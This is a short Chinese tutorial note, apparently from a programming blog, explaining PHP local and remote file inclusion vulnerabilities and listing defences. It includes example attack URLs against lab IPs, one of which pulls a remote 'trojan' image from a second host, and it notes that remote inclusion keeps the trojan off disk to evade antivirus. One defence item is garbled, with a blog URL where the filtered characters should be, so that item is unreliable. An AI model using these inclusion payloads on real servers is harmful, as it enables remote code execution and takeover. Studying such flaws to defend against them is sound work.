包含的文件没有做好过滤,攻击者可构造自己的图片木马当作脚本文件解析,只要用了文件包含函数,参数没做好过滤,不管参数是什么类型的文件,都会被当做脚本文件解析,PHP对于包含文件所提供的功能太强大,太灵活,所以文件包含漏洞经常出现在PHP语言中,其他语言也有,不多。
include()
用的多,包含文件有问题,返回警告,脚本继续执行
include_once()
用的多,包含文件有问题,返回警告脚本继续执行,加载一次,不重复加载
require()
用的少,包含文件有问题,脚本停止执行,重要程序,一般不用
require_once()
用的少,包含文件有问题,脚本停止执行,加载一次,不重复加载,重要程序,一般不用
本地包含 LIF
本地包含漏洞多:http://10.0.0.129:90/11.php?id=22.jpg
远程包含 RLF
前提条件
allow_url_include=on,开启远程包含,修改php.ini配置文件
magic_quotes_gpc=off,魔术符号关闭,修改php.ini配置文件
默认是关闭的,很少开启,所以远程包含漏洞一般很少,绝大多数都是攻击者自己开启的,木马文件不落地,木马上传到本地容易被waf,杀毒软件查杀,包含其他主机的文件,攻击的时候,木马没在被攻击的机器上,在攻击者的电脑上,以内存的方式运行,对方查不到木马,远程操控服务器,木马文件没落地 http://10.0.0.129:90/11.php?id=http://10.0.0.131:80/33.jpg
1.白名单过滤
2.过滤https://blog.csdn.net/Chales123/article/等特殊符号
3.修改Apache日志文件的存放地址
4.开启魔术引号magic_quotes_qpc=on
5.禁止远程文件包含allow_url_include=off
6.配置open_basedir=指定目录,限制访问区域。
7.尽量不要使用动态变量调用文件,直接写要包含的文件。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/bian-cheng-ri-ji/26200.html